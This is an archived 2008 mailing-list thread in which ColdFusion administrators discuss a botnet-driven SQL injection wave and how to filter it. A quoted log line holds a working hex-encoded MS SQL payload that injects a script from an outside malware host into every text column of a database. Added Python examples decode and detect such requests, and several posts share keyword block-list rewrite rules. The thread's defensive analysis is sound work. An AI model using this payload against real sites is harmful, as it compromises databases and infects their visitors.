Re: CF8 on linux -- who's running it on large sites? [ & distributed SQL injection attack ? ]

Thanks for the update. We've been running CF8 for a few months now with no problems. Approximately 1.5M CF pages a day on a single server. The server is barely breaking a sweat too... I suspect we could probably do 50% more traffic on this machine without major performance issues. We use lots of caching.

178 days now without a reboot. Haven't had a single crash since we switched to CF8. Needless to say, very impressed!

Totally unrelated: has anyone seen massive SQL injection attacks over the last few days / weeks? We're getting tens of thousands of injection attacks from hundreds of different IPs each day. It started off slow, but now they're coming in like mad. It has almost become a DoS attack now over the past 24 hrs.

The injection attacks don't worry me -- we're well coded against them (and these seem to be MSSQL attacks). But the sheer volume of traffic being generated is starting to get a little worrisome. Does anyone know more about where this attack is coming from? Is it a centrally controlled attack, a worm, ...?

Here is a typical attack:

70.156.129.101 - - [07/Aug/2008:17:12:33 -0500] "GET /path/template.cfm?gid=1074';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 36 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

Regards
Terry

--- On Fri, 8/1/08, Wil Genovese <juggler@...> wrote:

> From: Wil Genovese <juggler@...>
> Subject: Re: CF8 on linux -- who's running it on large sites?
> To: "CF-Linux" <cf-linux@...>
> Date: Friday, August 1, 2008, 6:14 PM
>
> > Hey folks,
> >
> > Looks like this list is pretty quiet nowadays.
> >
> > We're about ready to upgrade to CF8 from CF6.1, mainly for the performance improvements.
> >
> > We never upgraded from CF6.1 to 7 because 6.1 frankly runs just great and we use a pretty small and optimized set of features, but the juicy performance metrics of 8 look to be well worth it.
> >
> > I'm just curious as to how many of you larger linux implementations are running CFMX 8 right now, and what your experience has been stability-wise, and whether you ran into any compatibility or connector issues.
> >
> > Regards
> > Terry
>
> I just thought I would post an update on this since people are wondering about high traffic sites. We just launched the first of five CF 8.0.1 64-bit servers on Linux RH 5.xx.
>
> So far the installs we've done (in house and production) have not had any major issues. We've only needed to install our custom CFX or jars and tune the JVMs.
>
> This week we launched a production server and with a few minor JVM tuning tweaks we've got it running pretty good. This weekend and Monday will tell us more. So far it's handling about a third of our total website service traffic. We run three CF servers behind a load balancer to handle all the http://www.mlsfinder.com traffic. These three servers see about 2.3 million CF page views per day (as of July 1st, 2008) and the load is spread at 33% each.
>
> If this weekend and Monday (our servers' busiest day) turn out well we'll be upgrading the remaining servers next week.
>
> So far our cf7 code (which is really cf4 and cf5 code that was tweaked enough to run on CF7) runs just fine and even faster than on cf7. Turds really can fly with CF8. :-O (yeah the code base is old and we are starting a new code base which is CFMX OOMVC, but it all takes time and money.)
>
> Since we're upgrading from CF7.01 ENT 32-bit to CF8.0.1 64-bit our upgrade process is as follows: make a disk image (in case all goes bad), wipe the server clean and install RH 5 64-bit, then install CF8.0.1 64-bit. Then apply all the config settings.
>
> Wil Genovese
> Wolfnet Technologies, LLC

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4419
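The hex literal in Terry's log line is the whole attack: the request only declares @S, fills it from the CAST and runs EXEC(@S), so nothing readable ever appears in the URL. The following is an added example, not code from anyone in the thread. It percent-decodes the request target, pulls out the 0x... literal and decodes it to show the T-SQL that would have run on any server that concatenated gid into a query, then extracts the parts a responder needs for triage. The hex is copied from the log line above with the archive's line-wrapping spaces removed; the xtype code names are taken from SQL Server's systypes table, not from the thread.

```python
import re
from urllib.parse import unquote

# Hex literal from the CAST(0x... AS CHAR(4000)) in the posted log line,
# with the spaces the archive page inserted when wrapping it removed.
CAST_HEX = (
    "4445434C415245204054207661726368617228323535292C4043207661726368617228"
    "3430303029204445434C415245205461626"
    "C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C6"
    "22E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732"
    "06220776865726520612E69643D622E696420616E6420612E78747970653D277527206"
    "16E642028622E7874797"
    "0653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206"
    "F7220622E78747970653D31363729204F50454E205461626C655F437572736F7220464"
    "5544348204E4558542046524F4D20205461626C655F437572736F7220494E544F20405"
    "42C4043205748494C452"
    "8404046455443485F5354415455533D302920424547494E20657865632827757064617"
    "465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B272"
    "7223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E3"
    "13030306D672E636E2F6"
    "3737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272"
    "B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C7363726970742"
    "07372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6"
    "A73223E3C2F736372697"
    "0743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437"
    "572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43757"
    "2736F72204445414C4C4F43415445205461626C655F437572736F72"
)

# The request target from the log line, with the literal factored out above.
SAMPLE_REQUEST_TARGET = (
    "/path/template.cfm?gid=1074';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    + CAST_HEX
    + "%20AS%20CHAR(4000));EXEC(@S);"
)

# SQL Server systypes.xtype codes for the column types the payload rewrites
# (from SQL Server documentation, not from the thread).
XTYPE_NAMES = {35: "text", 99: "ntext", 167: "varchar", 231: "nvarchar/sysname"}

_CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR", re.I)


def extract_hex_literal(request_target):
    """Return the hex inside CAST(0x... AS CHAR(...)), or None if absent.

    The target is percent-decoded first so %20 separators and encoded
    keywords cannot hide the literal from the regex."""
    m = _CAST_RE.search(unquote(request_target))
    return m.group(1) if m else None


def decode_cast_payload(hex_literal):
    """Turn the 0x... literal into the T-SQL that EXEC(@S) would run.

    latin-1 maps every byte to one character, so decoding never raises;
    a real payload of this kind is plain ASCII anyway."""
    return bytes.fromhex(hex_literal).decode("latin-1")


def summarize(tsql):
    """Pull the facts a responder needs out of the decoded statement."""
    return {
        # A cursor over sysobjects/syscolumns hits every user table, not one target.
        "enumerates_user_tables": "sysobjects" in tsql and "xtype='u'" in tsql,
        # Column type codes the UPDATE is restricted to (text-like columns only).
        "column_xtypes": [int(x) for x in re.findall(r"b\.xtype=(\d+)", tsql)],
        # Distinct script URLs appended to every matching column value.
        "injected_scripts": sorted(set(re.findall(r'<script src="([^"]+)"', tsql))),
    }


def column_type_names(summary):
    """Map the xtype codes in a summary to their SQL Server type names."""
    return [XTYPE_NAMES.get(c, f"xtype {c}") for c in summary["column_xtypes"]]


if __name__ == "__main__":
    literal = extract_hex_literal(SAMPLE_REQUEST_TARGET)
    if literal is None:
        raise SystemExit("no CAST(0x...) literal in request")
    tsql = decode_cast_payload(literal)
    print(tsql)
    summary = summarize(tsql)
    print(summary, column_type_names(summary))
```

The decoded statement explains the "200 36" in the log: the page rendered normally, so a successful injection leaves no error to notice, and the only reliable way to know whether it worked is to check the text-type columns of every user table for the appended script tag.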
Re: CF8 on linux -- who's running it on large sites? [ & distributed SQL injection attack ? ]

It is a centrally controlled attack running on zombie computers. I am pretty sure that this is related to the recent spate of hijacking and DNS issues. You are not the lone ranger.

Cary Gordon
The Cherry Hill Company
http://chillco.com

On Aug 7, 2008, at 3:23 PM, Terry Ford wrote:

> Does anyone know more about where this attack is coming from? Is it a centrally controlled attack, a worm, ...?

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4420
Re: CF8 on linux -- who's running it on large sites? [ & distributed SQL injection attack ? ]

I actually reported on this in my ColdFusion in the News column in FA online. Hacker Webzine ran an article detailing SQL injection attack exploits against ColdFusion sites, and since then, we have come up on the radar as prime targets.

http://www.fusionauthority.com/news/4761-coldfusion-in-the-news-july-20-30-2008.htm

It's under the heading "Hack Attack" in the column. Basically, this kind of script-kiddie attack against CF sites has been mushrooming in the last two or three weeks.

Judith

On Thu, Aug 7, 2008 at 6:34 PM, Cary Gordon <listuser@...> wrote:

> It is a centrally controlled attack running on zombie computers. I am
> pretty sure that this is related to the recent spate of hijacking and
> DNS issues. You are not the lone ranger.

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4422
Re: CF8 on linux -- who's running it on large sites? [ & distributed SQL injection attack ? ]

Thanks for the information Judith, I've been trying to get the people at work to take security seriously. Maybe this will help ignite a fire under their butts.

Wil Genovese

One man with courage makes a majority. -Andrew Jackson
A fine is a tax for doing wrong. A tax is a fine for doing well.

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4423
Re: CF8 on linux -- who's running it on large sites? [ & distributed SQL injection attack ? ]

On Thursday 07 Aug 2008, Cary Gordon wrote:
> It is a centrally controlled attack running on zombie computers. I am
> pretty sure that this is related to the recent spate of hijacking and
> DNS issues.

It's nothing to do with the most recent DNS protocol changes.

--
Tom Chiverton

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4424
RE: CF8 on linux -- who's running it on large sites? [ & distributed SQL injection attack ? ]

Terry,

Here's a rundown:

http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCII

There are lots of useful comments and several cross posts at the bottom.

-mark

Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

-----Original Message-----
From: Cary Gordon [mailto:listuser@...]
Sent: Thursday, August 07, 2008 5:37 PM
To: CF-Linux
Subject: Re: CF8 on linux -- who's running it on large sites? [ & distributed SQL injection attack ? ]

It is a centrally controlled attack running on zombie computers. I am pretty sure that this is related to the recent spate of hijacking and DNS issues. You are not the lone ranger.

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4425
Re: CF8 on linux -- who's running it on large sites? [ & distributed SQL injection attack ? ]

You are right in that it is not directly connected to the recursive DNS issue, however the general increase in attacks on all fronts has been abetted by this issue. Criminals used DNS substitution to spoof trusted sites and lure users into downloading zombie software, which the criminals can then use to launch attacks, or sell and give to others to launch attacks.

--
Cary Gordon
The Cherry Hill Company
http://chillco.com

On Fri, Aug 8, 2008 at 1:58 AM, Tom Chiverton <tom.chiverton@...> wrote:
> On Thursday 07 Aug 2008, Cary Gordon wrote:
>> It is a centrally controlled attack running on zombie computers. I am
>> pretty sure that this is related to the recent spate of hijacking and
>> DNS issues.
>
> It's nothing to do with the most recent DNS protocol changes.
>
> --
> Tom Chiverton

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4426
SQL injection attacks getting out of control

Our server has now logged 51,000 attack requests in the last 4 hours.

160,000 attacks in the past 24 hours.

I suspect we are getting hit so hard because we have hundreds of thousands of pages in Google.

In short, these attacks are starting to grow very quickly in intensity.

We are redirecting them away from CF with mod_rewrite, so CURRENTLY there is no major problem.

My concern is what we are to do if these attacks keep growing at the current rate, and we end up taking in MILLIONS of requests an hour a day or two from now. Does anyone know of any solution?

Our ISP has a firewall product (Cisco ASA firewall), but it deals on the packet level only. It has no visibility into URLs, so we have no way right now to filter traffic based on URL parameters.

Any ideas on what we are to do should things continue to worsen?

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4427
RE: SQL injection attacks getting out of control

That's exactly what we are doing with URL re-writing. Outside of an IDS system I'm not sure what else you can do. Unfortunately ISPs won't step up and filter this type of traffic.

Mike

-----Original Message-----
From: Terry Ford [mailto:terryford76@...]
Sent: Friday, August 08, 2008 11:01 AM
To: CF-Linux
Subject: SQL injection attacks getting out of control

We are redirecting them away from CF with mod_rewrite, so CURRENTLY there is no major problem.

Any ideas on what we are to do should things continue to worsen?

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4428
Re: SQL injection attacks getting out of control

Buy stock in fiber optic production companies?

(Sorry, no intelligent answer comes to mind)

On Fri, Aug 8, 2008 at 12:00 PM, Terry Ford <terryford76@...> wrote:
> Our server has now logged 51,000 attack requests in the last 4 hours.
>
> 160,000 attacks in the past 24 hours.
> ...
> Any ideas on what we are to do should things continue to worsen?
>

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4429
Re: SQL injection attacks getting out of control

My approach would be to filter URLs longer than the longest legitimate URL before they got to my servers. My weapon of choice would be a Squid reverse proxy.

--
Cary Gordon
The Cherry Hill Company
http://chillco.com

On Aug 8, 2008, at 9:00 AM, Terry Ford wrote:
> Our server has now logged 51,000 attack requests in the last 4 hours.
>
> 160,000 attacks in the past 24 hours.
>
> I suspect we are getting hit so hard because we have hundreds of
> thousands of pages in Google.
>
> In short, these attacks are starting to grow very quickly in
> intensity.
>
> We are redirecting them away from CF with mod_rewrite, so CURRENTLY
> there is no major problem.
>
> My concern is what we are to do if these attacks keep growing at the
> current rate, and we end up taking in MILLIONS of requests an hour a
> day or two from now. Does anyone know of any solution?
>
> Our ISP has a firewall product (Cisco ASA firewall), but it deals on
> the packet level only. It has no visibility into URLs, so we have
> no way right now to filter traffic based on URL parameters.
>
> Any ideas on what we are to do should things continue to worsen?

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4430
Re: SQL injection attacks getting out of control

What is your rewrite rule? I'm ok with mod_rewrite, but no expert, that's for sure.

Wil Genovese

One man with courage makes a majority.
-Andrew Jackson

A fine is a tax for doing wrong. A tax is a fine for doing well.

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4431
RE: SQL injection attacks getting out of control

From our ISAPI_Rewrite. Should be pretty close to mod_rewrite:

# Helicon ISAPI_Rewrite configuration file
# Version 3.1.0.54

RewriteEngine On
RewriteCompatibility2 On
RepeatLimit 20
RewriteBase
# unsupported directive: [ISAPI_Rewrite]
# CacheClockRate 300

RewriteRule ^.*DECLARE%20.*$ http://www.cybercrime.gov/ [NC]
RewriteRule ^.*NVARCHAR.*$ http://www.cybercrime.gov/ [NC]
RewriteRule ^.*sp_password.*$ http://www.cybercrime.gov/ [NC]
RewriteRule ^.*%20xp_.*$ http://www.cybercrime.gov/ [NC]
RewriteRule ^.*EXEC\(@.*$ http://www.cybercrime.gov/ [NC]
RewriteRule ^.*%20@.*$ http://www.cybercrime.gov/ [NC]
RewriteRule ^METHOD$ OPTIONS

-----Original Message-----
From: Wil Genovese [mailto:juggler@...]
Sent: Friday, August 08, 2008 11:12 AM
To: CF-Linux
Subject: Re: SQL injection attacks getting out of control

what is your rewrite rule? I'm ok with mod-rewite, but no expert that's for sure.

Wil Genovese

One man with courage makes a majority.
-Andrew Jackson

A fine is a tax for doing wrong. A tax is a fine for doing well.

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4432
Re: SQL injection attacks getting out of control

Ok... here's what appears to be hitting us:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

I decoded the hex in the attack strings I'm seeing right now, and most of them are pointing to http://sdo.1000mg.cn/csrss/w.js.

That is the Asprox botnet, which went through ASP sites a few months ago... looks like they recruited a bunch of drones, and those drones have moved from ASP (verynx attacks) to attack CF. Pretty ingenious really, infecting websites via injection attack in order to infect clients with browser vulnerabilities.

The more CF sites that get infected, the more drones that are recruited, and the more persistent the attacks become.

In theory this should taper off as the botnet moves on to their next target. Looks like it's hitting sites such as houseoffusion and our site hardest, which each have zillions of pages indexed in Google (the botnet chooses target pages from Google searches).

Whatever the case, from what I've seen on CF-talk it appears that these attacks infected a lot of CF servers, and as such we're likely going to be targeted hard in all manners of attacks in the future. Looks like a good lesson against CF sloppiness.

p.s. we're up to 62000 attack attempts now in 5 hours. Still accelerating, but thankfully not exponential.

Here's the rewrite I'm using. Am no mod_rewrite expert, but it appears to be working:

RewriteCond %{QUERY_STRING} .*DECLARE.*
RewriteRule ^(.*)$ violation.htm [nc,L]

Interesting philosophical thought: I can't help but believe that the URL rewriting we do over much of our site (product.cfm?id=14 appearing as /product/14.html etc etc) has helped reduce the attacks significantly. It seems to me that such URL rewriting is actually a very important security tool, as we enter a period where botnets start targeting .cfm pages. I plan on increasing our CFM obfuscation over the coming weeks to help hide CF from the search engines and automated attacks.

Seems to me that it's a lot safer presenting your entire site as HTML to the outside world.

Regards
Terry

--- On Fri, 8/8/08, Wil Genovese <juggler@...> wrote:

> From: Wil Genovese <juggler@...>
> Subject: Re: SQL injection attacks getting out of control
> To: "CF-Linux" <cf-linux@...>
> Date: Friday, August 8, 2008, 12:11 PM
> what is your rewrite rule? I'm ok with mod-rewite, but
> no expert
> that's for sure.
>
>
> Wil Genovese
>
> One man with courage makes a majority.
> -Andrew Jackson
>
> A fine is a tax for doing wrong. A tax is a fine for doing
> well.

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4433
RE: SQL injection attacks getting out of control

You are going to want to do more than filter on DECLARE. The ones below are common to the SQL injections we've seen. We also are looking at the entire URL rather than just the query string, but it's up to you. You can even add one in for "CAST(" if you want. It conflicts with some things we are doing so we left it out.

RewriteRule ^.*DECLARE%20.*$ http://www.cybercrime.gov/ [NC]
RewriteRule ^.*NVARCHAR.*$ http://www.cybercrime.gov/ [NC]
RewriteRule ^.*sp_password.*$ http://www.cybercrime.gov/ [NC]
RewriteRule ^.*%20xp_.*$ http://www.cybercrime.gov/ [NC]
RewriteRule ^.*EXEC\(@.*$ http://www.cybercrime.gov/ [NC]
RewriteRule ^.*%20@.*$ http://www.cybercrime.gov/ [NC]

> Here's the rewrite I'm using. Am no mod_rewrite expert, but it appears to be working:
>
> RewriteCond %{QUERY_STRING} .*DECLARE.*
> RewriteRule ^(.*)$ violation.htm [nc,L]

Mike Chytracek
Managing Partner
Ignite Solutions

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4434
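The rewrite rules in this thread (Terry's RewriteCond on the query string, Mike's keyword list), Cary Gordon's idea of dropping anything longer than the longest legitimate URL, and Terry's hex decoding of the CAST(0x...) literal are all one piece of detection logic. The block below is an added example written for this page, not code from the thread or from Helicon, Apache or Squid; it runs that logic over constructed access-log lines. The 192.0.2.x addresses, the js.example.invalid script host, the stand-in SQL inside the hex literal and the 256-byte length threshold are all constructed values.

```python
"""Flag hex-encoded SQL injection requests in Combined Log Format lines.

Added example for the CF-Linux thread; sample traffic is constructed.
"""
import re
from urllib.parse import unquote

# ip ident user [ts] "METHOD url PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)

# Signatures adapted from the rewrite rules posted in the thread, applied to
# the URL-decoded request (so %20 is a space) and to the decoded hex payload.
SIGNATURES = [
    ("declare",     re.compile(r"\bDECLARE\s+@", re.IGNORECASE)),
    ("nvarchar",    re.compile(r"\bNVARCHAR\b", re.IGNORECASE)),
    ("sp_password", re.compile(r"\bsp_password\b", re.IGNORECASE)),
    ("xp_",         re.compile(r"\bxp_\w+", re.IGNORECASE)),
    ("exec_var",    re.compile(r"\bEXEC\s*\(\s*@", re.IGNORECASE)),
    ("hex_cast",    re.compile(r"\bCAST\s*\(\s*0x[0-9a-fA-F]+\s+AS\b", re.IGNORECASE)),
]
HEX_CAST_RE = re.compile(r"\bCAST\s*\(\s*0x([0-9a-fA-F]+)\s+AS\b", re.IGNORECASE)
URL_IN_TEXT_RE = re.compile(r"https?://[^\s\"'<>]+")

# Cary Gordon's length filter. Constructed threshold; measure your own logs.
MAX_LEGIT_URL_LEN = 256


def decode_hex_cast(decoded_request):
    """Return the text hidden inside CAST(0x... AS ...), or None.

    The plain query string shows little more than CAST and a long number;
    decoding the literal exposes the SQL and the script URL being injected.
    """
    m = HEX_CAST_RE.search(decoded_request)
    if not m:
        return None
    try:
        raw = bytes.fromhex(m.group(1))
    except ValueError:  # odd length or non-hex garbage: nothing to decode
        return None
    return raw.decode("latin-1")  # single-byte text; never raises


def classify(log_line):
    """Parse one log line; return a verdict dict, or None if unparsable."""
    m = LOG_RE.match(log_line)
    if not m:
        return None
    url = m.group("url")
    decoded = unquote(url)
    payload = decode_hex_cast(decoded)
    # Check both layers so a payload that hides every keyword inside the
    # hex literal is still caught once decoded.
    haystack = decoded + ("\n" + payload if payload else "")
    hits = [name for name, rx in SIGNATURES if rx.search(haystack)]
    too_long = len(url) > MAX_LEGIT_URL_LEN
    return {
        "ip": m.group("ip"),
        "hits": hits,
        "too_long": too_long,
        "script_urls": URL_IN_TEXT_RE.findall(payload) if payload else [],
        "block": bool(hits) or too_long,
    }


def summarize(lines):
    """Blocked requests per source IP, the kind of count the thread quotes."""
    counts = {}
    for line in lines:
        r = classify(line)
        if r and r["block"]:
            counts[r["ip"]] = counts.get(r["ip"], 0) + 1
    return counts


# Constructed sample traffic. The SQL inside the hex literal is a harmless
# stand-in for the botnet's statement; it keeps only the DECLARE/<script> shape.
_SAMPLE_SQL = ("DECLARE @T varchar(255);"
               "SELECT '<script src=\"http://js.example.invalid/w.js\"></script>'")
_SAMPLE_HEX = _SAMPLE_SQL.encode("ascii").hex()
ATTACK_LINE = (
    '192.0.2.10 - - [07/Aug/2008:17:12:33 -0500] '
    '"GET /path/template.cfm?gid=1074\';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x'
    + _SAMPLE_HEX + '%20AS%20CHAR(4000));EXEC(@S);-- HTTP/1.1" 200 512'
)
BENIGN_LINE = ('192.0.2.20 - - [07/Aug/2008:17:12:34 -0500] '
               '"GET /product/14.html HTTP/1.1" 200 8192')
LONG_LINE = ('192.0.2.30 - - [07/Aug/2008:17:12:35 -0500] '
             '"GET /search.cfm?q=' + "a" * 300 + ' HTTP/1.1" 200 1024')

if __name__ == "__main__":
    for line in (ATTACK_LINE, BENIGN_LINE, LONG_LINE):
        print(classify(line))
    print(summarize([ATTACK_LINE, BENIGN_LINE, LONG_LINE]))
```

Two caveats when carrying the posted rules over to Apache mod_rewrite: the RewriteRule pattern is matched against the URL path only, so Mike's `%20`-based patterns will never see the query string there and need a `RewriteCond %{QUERY_STRING}` like Terry's; and the `[nc,L]` flags on Terry's RewriteRule do not make his RewriteCond case-insensitive, so the condition needs its own `[NC]` or a lowercase `declare` slips through.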
RE: SQL injection attacks getting out of control

> RewriteCond %{QUERY_STRING} .*DECLARE.*
> RewriteRule ^(.*)$ violation.htm [nc,L]

Ok, that looks short and simple enough that maybe I can handle with 156 emails from the list.

I have never used any mod_rewrites or whatever, so I guess I should put these on my VPS running MySQL and IIS6?

If so, is there a simple explanation of how to do it? Oh wait, this came from the cf-linux list. The mod is a linux deal only, right?

You guys have got me worried...

Rick

> -----Original Message-----
> From: Terry Ford [mailto:terryford76@...]
> Sent: Friday, August 08, 2008 1:21 PM
> To: CF-Linux
> Subject: Re: SQL injection attacks getting out of control
>
> Ok... here's what appears to be hitting us:
>
> http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
>
> I decoded the hex in the attack strings I'm seeing right now, and most of them are pointing to http://sdo.1000mg.cn/csrss/w.js.
>
> That is the Asprox botnet, which went through ASP sites a few months ago... looks like they recruited a bunch of drones, and those drones have moved from ASP (verynx attacks) to attack CF. Pretty ingenious really, infecting websites via injection attack in order to infect clients with browser vulnerabilities.
>
> The more CF sites that get infected, the more drones that are recruited, and the more persistent the attacks become.
>
> In theory this should taper off as the botnet moves on to their next target. Looks like it's hitting sites such as houseandfusion and our site hardest, which each have zillions of pages indexed in Google (they botnet chooses target pages from Google searches).
>
> Whatever the case, from what I've seen on CF-talk it appears that these attacks infected a lot of CF servers, and as such we're likely going to be targeted hard in all manners of attacks in the future. Looks like a good lesson against CF sloppiness.
>
> p.s. we're up to 62000 attack attempts now in 5 hours. Still accelerating, but thankfully not exponential.
>
> Here's the rewrite I'm using. Am no mod_rewrite expert, but it appears to be working:
>
> RewriteCond %{QUERY_STRING} .*DECLARE.*
> RewriteRule ^(.*)$ violation.htm [nc,L]
>
> Interesting philosophical thought: I can't help but believe that the URL rewriting we do over much of our site (product.cfm?id=14 appearing as /product/14.html etc etc) has helped reduce the attacks significantly. It seems to me that such URL rewriting is actually a very important security tool, as we enter a period where botnets start targetting .cfm pages. I plan on increasing our CFM obfuscation over the coming weeks to help hide CF from the search engines and automated attacks. Seems to me that it's a lot safer presenting your entire site as HTML to the outside world.
>
> Regards
> Terry
>
> --- On Fri, 8/8/08, Wil Genovese <juggler@...> wrote:
>
> > From: Wil Genovese <juggler@...>
> > Subject: Re: SQL injection attacks getting out of control
> > To: "CF-Linux" <cf-linux@...>
> > Date: Friday, August 8, 2008, 12:11 PM
> > what is your rewrite rule? I'm ok with mod-rewite, but
> > no expert
> > that's for sure.
> >
> > Wil Genovese
> >
> > One man with courage makes a majority.
> > -Andrew Jackson
> >
> > A fine is a tax for doing wrong. A tax is a fine for doing
> > well.

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4435
Re: SQL injection attacks getting out of control

Rick, I believe this current wave of attacks is only targeting MS SQL Server. You mention you are using MySQL, so *this* particular attack should be of no concern to you.

-Ryan

Rick Faircloth wrote:
>> RewriteCond %{QUERY_STRING} .*DECLARE.*
>> RewriteRule ^(.*)$ violation.htm [nc,L]
>
> Ok, that looks short and simple enough that maybe I can handle with 156 emails from the list.
>
> I have never used an mod_rewrites or whatever, so I guess I should put these on my VPS running MySQL and IIS6?
>
> If so, is there a simple explanation of how to do it? Oh wait, this came from the cf-linux list. The mod is a linux deal only, right?
>
> You guys have got me worried...
>
> Rick
>
>> -----Original Message-----
>> From: Terry Ford [mailto:terryford76@...]
>> Sent: Friday, August 08, 2008 1:21 PM
>> To: CF-Linux
>> Subject: Re: SQL injection attacks getting out of control
>>
>> Ok... here's what appears to be hitting us:
>>
>> http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
>>
>> I decoded the hex in the attack strings I'm seeing right now, and most of them are pointing to http://sdo.1000mg.cn/csrss/w.js.
>>
>> That is the Asprox botnet, which went through ASP sites a few months ago... looks like they recruited a bunch of drones, and those drones have moved from ASP (verynx attacks) to attack CF. Pretty ingenious really, infecting websites via injection attack in order to infect clients with browser vulnerabilities.
>>
>> The more CF sites that get infected, the more drones that are recruited, and the more persistent the attacks become.
>>
>> In theory this should taper off as the botnet moves on to their next target. Looks like it's hitting sites such as houseandfusion and our site hardest, which each have zillions of pages indexed in Google (they botnet chooses target pages from Google searches).
>>
>> Whatever the case, from what I've seen on CF-talk it appears that these attacks infected a lot of CF servers, and as such we're likely going to be targeted hard in all manners of attacks in the future. Looks like a good lesson against CF sloppiness.
>>
>> p.s. we're up to 62000 attack attempts now in 5 hours. Still accelerating, but thankfully not exponential.
>>
>> Here's the rewrite I'm using. Am no mod_rewrite expert, but it appears to be working:
>>
>> RewriteCond %{QUERY_STRING} .*DECLARE.*
>> RewriteRule ^(.*)$ violation.htm [nc,L]
>>
>> Interesting philosophical thought: I can't help but believe that the URL rewriting we do over much of our site (product.cfm?id=14 appearing as /product/14.html etc etc) has helped reduce the attacks significantly. It seems to me that such URL rewriting is actually a very important security tool, as we enter a period where botnets start targetting .cfm pages. I plan on increasing our CFM obfuscation over the coming weeks to help hide CF from the search engines and automated attacks. Seems to me that it's a lot safer presenting your entire site as HTML to the outside world.
>>
>> Regards
>> Terry
>>
>> --- On Fri, 8/8/08, Wil Genovese <juggler@...> wrote:
>>
>>> From: Wil Genovese <juggler@...>
>>> Subject: Re: SQL injection attacks getting out of control
>>> To: "CF-Linux" <cf-linux@...>
>>> Date: Friday, August 8, 2008, 12:11 PM
>>> what is your rewrite rule? I'm ok with mod-rewite, but
>>> no expert
>>> that's for sure.
>>>
>>> Wil Genovese
>>>
>>> One man with courage makes a majority.
>>> -Andrew Jackson
>>>
>>> A fine is a tax for doing wrong. A tax is a fine for doing
>>> well.

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4436
Re: SQL injection attacks getting out of control

On Mon, Aug 11, 2008 at 4:20 PM, Ryan Stille <ryan@...> wrote:
> Rick, I believe this current wave of attacks is only targeting MS SQL
> Server. You mention you are using MySQL, so *this* particular attack
> should be of no concern to you.
>

What gives you that idea? We run CF on Linux/Apache with MySQL, and we've been under attack since Thursday, although thankfully it is easing now.

--
mac jordan
www.webhorus.net | www.reactivecooking.com | www.nibblous.com | www.jordan-cats.org

Archive: http://www.houseoffusion.com/groups/CF-Linux/message.cfm/messageid:4437